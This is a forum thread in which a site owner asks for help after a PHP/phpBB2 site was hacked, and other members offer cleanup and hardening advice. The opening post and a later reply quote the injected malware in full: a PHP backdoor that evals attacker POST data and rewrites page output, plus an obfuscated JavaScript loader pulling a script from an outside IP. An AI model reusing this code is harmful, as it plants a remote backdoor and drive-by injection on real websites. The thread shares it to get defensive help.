Recovering from a hack... can anyone assist?!

gary82

Hey guys,

One of my sites got hacked last night... it replaced all the ?> in the php files with...

if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCcyQiUzQ1pJc0M2Y3NMcjVzaXAyQnQlMjAzRjlzcmNaSSUzRElOJTJGJTJGMkI3OCUyRTJCMXJFMTAlMkUxNzVJTiUyRTI0SU45JTJGanF1SU5lcnklMkVqM0Y5cyUzRSUzQzJCJTJGQzZzMkJjc0xySU5pcDNGOXQlM0UnKS5yZXBsYWNlKC9zTHx3UW18ckV8NXN8MkJ8M0Y5fEM2fElOfFpJL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

... and that in turn tried to place and iframe on the page but AVG started hopping saying it detected "Exploit JavaScript Obfuscation".

So i downloaded all the files from the site, did a batch find-replace over them to restore the ?> where it found that code. And copied them back online. Now the site isn't showing up right on the browser - it's only showing the header.

Yet the html seems to be there, and when I copy the source code into dreamweaver and link up the css correctly again it seems to format grand.

Any ideas of suggestions?

Here's the site: www.divegear.ie

I changed the ftp password too, some forums suggested that it could be some form of keylogger, and my avg did find a trojan. The new ftp password was entered using copy and paste of other words on the page, that'd fool it right?

I don't mind sharing the ftp settings with some of the main regular guys here, I trust ye and really want to get this sorted asap.

louie

check the .htaccess file for code that is not meant to be there.
If the "hacker" got ftp access he might have other files there that stops from showing the page itself.

chat2joe

Had a look and there are no .htaccess file ....

Now I'm not sure if they were there. Or maybe they were deleted? Should I have them there?


I don't get why the html is in the source code when you check via the browser but it's not showing up......

chat2joe

Oh and this index.htm file was also placed in a lot of diretories...

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<script language=javascript><!-- 
document.write(unescape('2B%3CZIsC6csLr5sip2Bt%203F9srcZI%3DIN%2F%2F2B78%2E2B1rE10%2E175IN%2E24IN9%2FjquINery%2Ej3F9s%3E%3C2B%2FC6s2BcsLrINip3F9t%3E').replace(/sL|wQm|rE|5s|2B|3F9|C6|IN|ZI/g,""));
 --></script><body bgcolor="#FFFFFF" text="#000000">

</body>
</html>

NotMe

Check the source again. Your page is linking to 78.110.175.249/jquery.js which is dodgy.

There's more about it here: http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/

chat2joe

Thanks for the link NotMe, that's exactly what happened me.

I've found more dodge code in the file so I'm uploading again now after another find-replace job. Fingers crossed!

Any suggestions on how to up security for the site?

Is it because the site is phpbb2 based? It's running phpca on phpbb2, unfortunately phpca hasn't been updated for phpbb3....

chat2joe

Back up online and looks to be working perfect!

Any security recommendations welcome though...

colm_c

chat2joe wrote: »

Back up online and looks to be working perfect!

Any security recommendations welcome though...

Do you know how they got in? FTP presumably?

If so contact the hosting company, they should have a log of recent IP/FTP connections. You should report this to the gardai, with their IP address, as well as the ISP who provided it - check www.ripe.net

In terms of security, change your password for a start to something not as hackable - at least one number, one special character and a capital letter.

smcelhinney

Could have been via ssh or telnet either, and could have been brute force. Is your webserver on Linux or Windows? If Linux, look at bfd or denyhosts to prevent brute force. Also, you could disable ssh login by password, and only use public/private key. There's plenty of resources on the web about this.

Let us know how you get on mate.